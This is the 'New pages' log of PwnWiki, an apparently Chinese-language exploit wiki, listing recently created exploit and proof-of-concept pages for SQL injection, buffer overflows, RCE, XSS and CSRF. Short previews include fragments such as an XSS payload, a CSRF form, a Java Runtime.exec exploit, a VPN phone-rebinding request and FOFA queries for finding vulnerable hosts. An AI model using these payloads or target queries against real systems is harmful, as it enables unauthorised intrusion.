New pages

(newest | oldest) View (newer 50 | older 50) (20 | 50 | 100 | 250 | 500)

12:59, 2 May 2021 ‎TheCarProject 2 - Multiple SQL注入漏洞 (hist | edit) ‎[4,686 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> =========================================================================================== # Exploit Title: TheCarProject v2 - 'man_id' SQL Inj. # Dork: N/A # D...")
12:58, 2 May 2021 ‎WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 拒絕服務漏洞 (hist | edit) ‎[801 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: WinAVI iPod/3GP/MP4/PSP Converter 4.4.2 Local Dos Exploit # Date: 16.03.2019 # Vendor Homepage:http://www.winavi.com # Software Link: http://ww...")
12:58, 2 May 2021 ‎OpenDocMan 1.3.4 - 'search.php where' SQL 注入漏洞 (hist | edit) ‎[1,122 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> =========================================================================================== # Exploit Title: OpenDocMan 1.3.4 - ’where’ SQL Injection # CVE:...")
12:57, 2 May 2021 ‎OOP CMS BLOG 1.0 - Multiple SQL注入漏洞 (hist | edit) ‎[807 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: OOP CMS BLOG 1.0 - SQL Injection # Exploit Author: Mr Winst0n # Author E-mail: manamtabeshekan[@]gmail[.]com # Discovery Date: March 1, 2019 # V...")
12:57, 2 May 2021 ‎CVE-2019-9041 zzzphp CMS 1.6.1 遠程代碼執行漏洞 (hist | edit) ‎[1,042 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: dynamic code evaluation of zzzphp cms 1.6.1 # Google Dork: intext:"2015-2019 zzcms.com" # Date: 24/02/2019 # Exploit Author: Yang Chenglong...")
12:55, 2 May 2021 ‎SJS Simple Job Script SQL注入&XSS漏洞 (hist | edit) ‎[1,427 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> # Exploit Title: Simple Job Script - Multiple Vulnerabilities # Date: 26.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: https://simplejobscript....")
12:53, 2 May 2021 ‎X-NetStat Pro 5.63 本地緩衝區溢出漏洞 (hist | edit) ‎[8,517 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> #!/usr/bin/env python #---------------------------------------------------------------------------------------------------------# # Exploit: X-NetStat Pro 5.63 -...")
12:51, 2 May 2021 ‎Placeto CMS Alpha v4 - 'page' SQL注入漏洞 (hist | edit) ‎[1,214 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> Placeto CMS Alpha v4 - 'page' SQL Injection # Title: Placeto CMS # Date: 21.03.2019 # Exploit Author: Abdullah Çelebi # Vendor Homepage: https://sourceforge.ne...")
12:49, 2 May 2021 ‎CVE-2018-9128 DVD X Player 5.5.3 - '.plf' 緩衝區溢出漏洞 (hist | edit) ‎[3,045 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> #!/usr/bin/env python # Exploit Title: DVD X Player 5.5.3 Buffer Overflow # Date: 20.03.2019 # Exploit Author: Paolo Perego - [email protected] # Vendor Hom...")
12:48, 2 May 2021 ‎202CMS v10beta - Multiple SQL注入漏洞 (hist | edit) ‎[2,514 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> =========================================================================================== # Exploit Title: 202CMS - 'log_user' SQL Inj. # Dork: N/A # Date: 20-...")
12:47, 2 May 2021 ‎NetShareWatcher 1.5.8.0 本地SEH緩衝區溢出漏洞 (hist | edit) ‎[2,228 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: NetShareWatcher 1.5.8.0 - SEH Buffer Overflow # Date: 2019-03-19 # Vendor Homepage: http://netsharewatcher.nsauditor.com # Software Link: http:...")
12:46, 2 May 2021 ‎CVE-2019-10226 Fat Free CRM 0.19.0 HTML注入漏洞 (hist | edit) ‎[2,418 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Fat Free CRM v0.19.0 - HTML Injection # Date: 2019-03-20 # Exploit Author: Ismail Tasdelen # Vendor Homepage: http://www.fatfreecrm.com/ # Sourc...")
12:44, 2 May 2021 ‎PhreeBooks ERP 5.2.3 任意文件上傳漏洞 (hist | edit) ‎[2,960 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> PhreeBooks ERP v5.2.3 - Arbitrary File Upload # Date: 03.04.2019 # Exploit Author: Abdullah Çelebi # Vendor Homepage: https://www.phreesoft.com/ # Software Lin...")
12:42, 2 May 2021 ‎PhreeBooks ERP 5.2.3 遠程命令執行漏洞 (hist | edit) ‎[6,798 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: PhreeBooks ERP 5.2.3 - Remote Command Execution # Date: 2010-04-03 # Exploit Author: Metin Yunus Kandemir (kandemir) # Vendor Homepage: https://...")
12:41, 2 May 2021 ‎Ashop Shopping Cart Software SQL注入漏洞 (hist | edit) ‎[651 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> # Exploit Title: Ashop Shopping Cart Software - SQL Injection # Date: 03.03.2019 # Exploit Author: Ahmet Ümit BAYRAM # Vendor Homepage: http://www.ashopsoftware...")
12:40, 2 May 2021 ‎CVE-2019-11537 osTicket 1.11 XSS&本地文件包含漏洞 (hist | edit) ‎[3,870 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: osTicket v1.11 - Cross-Site Scripting to Local File Inclusion # Date: 09.04.2019 # Exploit Author: Özkan Mustafa Akkuş (AkkuS) @ehakkus # Cont...")
12:39, 2 May 2021 ‎PHPads 2.0 - 'click.php3?bannerID' SQL注入漏洞 (hist | edit) ‎[1,596 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> [+] Sql Injection on PHPads Version 2.0 based on Pixelledads 1.0 by Nile Flores [+] Date: 05/05/2019 [+] Risk: High [+] CWE Number : CWE-89 [+] Author: Felip...")
12:38, 2 May 2021 ‎Iperius Backup 6.1.0 權限提升漏洞 (hist | edit) ‎[2,681 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> Exploit Author: bzyo Twitter: @bzyo_ Exploit Title: Iperius Backup 6.1.0 - Privilege Escalation Date: 04-24-19 Vulnerable Software: Iperius Backup 6.1.0 Vendor H...")
12:37, 2 May 2021 ‎Encrypt PDF 2.3 拒絕服務漏洞 (hist | edit) ‎[793 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> # -*- coding: utf-8 -*- # Exploit Title: Encrypt PDF v2.3 - Denial of Service (PoC) # Date: 19/05/2019 # Author: Alejandra Sánchez # Vendor Homepage: http://www...")
12:36, 2 May 2021 ‎PCL Converter 2.7 拒絕服務漏洞 (hist | edit) ‎[909 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> # -*- coding: utf-8 -*- # Exploit Title: VeryPDF PCL Converter v2.7 - Denial of Service (PoC) # Date: 19/05/2019 # Author: Alejandra Sánchez # Vendor Homepage:...")
12:35, 2 May 2021 ‎DocPrint Pro 8.0 拒絕服務漏洞 (hist | edit) ‎[923 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> # -*- coding: utf-8 -*- # Exploit Title: Document Converter (docPrint Pro) v8.0 - Denial of Service (PoC) # Date: 19/05/2019 # Author: Alejandra Sánchez # Vendo...")
12:34, 2 May 2021 ‎AbsoluteTelnet 10.16 - 'License name' 拒絕服務漏洞 (hist | edit) ‎[702 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> #Exploit Title: AbsoluteTelnet 10.16 - 'License name' Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-19 #Vendor Homepage: http...")
12:33, 2 May 2021 ‎Deluge 1.3.15 - 'URL' 拒絕服務漏洞 (hist | edit) ‎[693 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> #Exploit Title: Deluge 1.3.15 - 'URL' Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-20 #Vendor Homepage: https://dev.deluge-t...")
12:32, 2 May 2021 ‎Deluge 1.3.15 - 'Webseeds' 拒絕服務漏洞 (hist | edit) ‎[677 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> #Exploit Title: Deluge 1.3.15 - 'Webseeds' Denial of Service (PoC) #Discovery by: Victor Mondragón #Discovery Date: 2019-05-20 #Vendor Homepage: https://dev.del...")
12:30, 2 May 2021 ‎CVE-2018-20469 Sahi pro 8.x SQL注入漏洞 (hist | edit) ‎[1,199 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Sahi pro ( <= 8.x ) sensitive information disclosure by SQL injection. # Date: 17-06-2019 # Exploit Author: Goutham Madhwaraj ( https://barriers...")
12:29, 2 May 2021 ‎CVE-2018-20472 Sahi pro 8.x XSS漏洞 (hist | edit) ‎[1,147 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: Sahi pro ( <= 8.x ) Stored XSS # Date: 17-06-2019 # Exploit Author: Goutham Madhwaraj ( https://barriersec.com ) # Vendor Homepage: https://sahi...")
12:28, 2 May 2021 ‎Tuneclone 2.20 本地SEH緩衝區溢出漏洞 (hist | edit) ‎[2,775 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: TuneClone Local Seh Exploit # Date: 19.06.2019 # Vendor Homepage: http://www.tuneclone.com/ # Software Link: http://www.tuneclone.com/tuneclon...")
12:27, 2 May 2021 ‎Sar2HTML 3.2.1 遠程命令執行漏洞 (hist | edit) ‎[558 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: sar2html Remote Code Execution # Date: 01/08/2019 # Exploit Author: Furkan KAYAPINAR # Vendor Homepage:https://github.com/cemtan/sar2html # Sof...")
12:26, 2 May 2021 ‎CVE-2019-14422 TortoiseSVN 1.12.1 遠程代碼執行漏洞 (hist | edit) ‎[5,846 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> Document Title: =============== TortoiseSVN v1.12.1 - Remote Code Execution Vulnerability References (Source): ==================== https://www.vulnerability-l...")
12:24, 2 May 2021 ‎ABC2MTEX 1.6.1 命令行堆棧溢出漏洞 (hist | edit) ‎[2,663 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> Exploit Title: ABC2MTEX 1.6.1 - Command Line Stack Overflow Date: 2019-08-13 Exploit Author: Carter Yagemann <[email protected]> Vendor Homepage: https://abcno...")
12:23, 2 May 2021 ‎RAR Password Recovery 1.80 拒絕服務漏洞 (hist | edit) ‎[863 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: RAR Password Recovery v1.80 Denial of Service Exploit # Date: 16.08.2019 # Vendor Homepage:https://www.top-password.com/ # Software Link: https...")
12:22, 2 May 2021 ‎Web Wiz Forums 12.01 - 'PF' SQL注入漏洞 (hist | edit) ‎[785 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: Web Wiz Forums 12.01 - 'PF' SQL Injection # Date: 2019-09-16 # Exploit Author: n1x_ [MS-WEB] # Vendor Homepage: https://www.webwiz.net/web-wiz-f...")
12:22, 2 May 2021 ‎CVE-2019-13623 Ghidra (Linux) 9.0.4 - .gar 任意代碼執行漏洞 (hist | edit) ‎[2,530 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> import os import inspect import argparse import shutil from shutil import copyfile print("") print("") print("################################################")...")
10:19, 1 May 2021 ‎Fhadmin Getshell漏洞 (hist | edit) ‎[411 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> icon_hash="-974263840" </pre> ==漏洞利用== 這個框架是shiro的，密鑰改了，但是沒改驗證繞過 File: 548fe563fcb29da7d51bc4af698d369a6e39b...")
10:03, 1 May 2021 ‎CatfishCMS 後臺存儲型XSS漏洞 (hist | edit) ‎[58 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> neiron=<img src=x onerror=alert(123)> </pre>")
10:02, 1 May 2021 ‎CatfishCMS 後臺CSRF漏洞 (hist | edit) ‎[522 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==Payload== <pre> <html>  <body> <script>history.pushState('', '', '/')</script> <form action="http://0-sec.org...")
09:59, 1 May 2021 ‎深信服VPN M7.6.1 任意修改綁定手機 (hist | edit) ‎[174 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> https://127.0.0.1/por/changetelnum.csp?apiversion=1 POST： newtel=TARGET_PHONE&sessReq=clusterd&username=TARGET_USERNAME&grpid=0&sessid=0&ip=127.0.0.1 </pre>")
09:58, 1 May 2021 ‎綠盟UTS綜合威脅探針管理員任意登錄漏洞 (hist | edit) ‎[342 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞利用== 對響應包進行修改，將false更改為true的時候可以洩露管理用戶的md5值密碼利用渠道的md5值去登錄頁面7ac301836522b54afcbbed71...")
09:51, 1 May 2021 ‎CVE-2018-20250 WinRAR目錄穿越漏洞 (hist | edit) ‎[3,552 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞原理== 該漏洞是由於WinRAR 所使用的一個陳舊的動態鏈接庫UNACEV2.dll所造成的，該動態鏈接庫在2006 年被編譯，沒有任何的基礎保...")
09:31, 1 May 2021 ‎CVE-2020-9548 jackson-databind RCE漏洞 (hist | edit) ‎[1,066 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==漏洞利用== 編譯Exploit.java: <pre> import java.lang.Runtime; public class Exploit { static { try { Runtime.getRuntime().exec("calc");...")
09:27, 1 May 2021 ‎CVE-2019-16132 OKLite v1.2.25 任意文件刪除漏洞 (hist | edit) ‎[338 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==版本== OKLite v1.2.25 ==前提條件== 需要登錄後臺面板 ==漏洞利用== 在主目錄下創建一個index.txt用來測試登錄後台，在設置->風格管理...")
09:26, 1 May 2021 ‎CVE-2019-16131 OKLite v1.2.25 任意文件上傳漏洞 (hist | edit) ‎[291 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==版本== OKLite v1.2.25 ==漏洞利用== 登錄後台，點擊模塊管理編輯一個測試文件test.php,壓縮為test.zip上傳。然後導入模塊點擊開始上...")
09:23, 1 May 2021 ‎Freetextbox Asp.net解析漏洞 (hist | edit) ‎[114 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==POC== <pre> http://navisec.it/Member/images/ftb/HelperScripts/ftb.imagegallery.aspx?frame=1&rif=..&cif=.. </pre>")
09:20, 1 May 2021 ‎藍凌OA custom.jsp 任意文件讀取漏洞 (hist | edit) ‎[2,483 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> app="Landray-OA系统" </pre> ==漏洞利用== 出現漏洞的文件為 custom.jsp, 請求包如下： <pre> POST /sys/ui/extend/varkind/custom.jsp HTTP/1.1 Ho...")
09:02, 1 May 2021 ‎CVE-2021-29921 python3.8.0-v3.10 SSRF&RFI漏洞 (hist | edit) ‎[2,034 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==簡介== python stdlib “ipaddress” – Improper Input Validation of octal literals in python 3.8.0 thru v3.10 results in indeterminate SSRF & RFI vulnerabilities. —...")
22:26, 30 April 2021 ‎CVE-2016-4971 Wget小於1.18 任意文件上傳&遠程命令執行漏洞 (hist | edit) ‎[1,683 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==EXP== <pre> # Exploit Title: GNU Wget < 1.18 - Arbitrary File Upload / Remote Code Execution (2) # Original Exploit Author: Dawid Golunski # Exploit Author: liewehacksie # V...")
22:04, 30 April 2021 ‎2021年4月贊助金額 (hist | edit) ‎[367 bytes] ‎Pwnwiki (talk | contribs) (Created page with "2021年4月1日-2021年4月30日，總計贊助人數4人，贊助金額198.47美金。以下表格是4月份捐贈名單： {| class="wikitable" |+ 2020年4月贊助者名...") Tag: Visual edit: Switched
18:14, 30 April 2021 ‎CVE-2019-3810 Moodle 3.6.1 XSS漏洞 (hist | edit) ‎[2,691 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==XSS== <pre> # Exploit Title: Moodle 3.6.1 - Persistent Cross-Site Scripting (XSS) # Date: 04/2021 # Exploit Author: farisv # Vendor Homepage: https://moodle.org/ # Software...")
17:58, 30 April 2021 ‎銳捷雲課堂主機目錄遍歷漏洞 (hist | edit) ‎[116 bytes] ‎Pwnwiki (talk | contribs) (Created page with "==FOFA== <pre> title="Ruijie" && "云课堂主机" </pre> ==漏洞利用== <pre> http://xxx.xxx.xxx.xxx/pool </pre>")
15:09, 30 April 2021 ‎CVE-2019-14287 Sudo權限繞過漏洞 (hist | edit) ‎[418 bytes] ‎Atsud0 (talk | contribs) (Created page with "=== Info === [https://blog.aquasec.com/cve-2019-14287-sudo-linux-vulnerability CVE-2019-14287 sudo Vulnerability Allows Bypass of User Restrictions] ==== 利用要求 ====...") Tag: Visual edit: Switched

(newest | oldest) View (newer 50 | older 50) (20 | 50 | 100 | 250 | 500)

Anonymous

Search

New pages

Namespaces

More

Page actions

Navigation

Navigation

Community

PwnWiki.org

Wiki tools

Wiki tools

Anonymous

Search

New pages

Navigation

Wiki tools

Page tools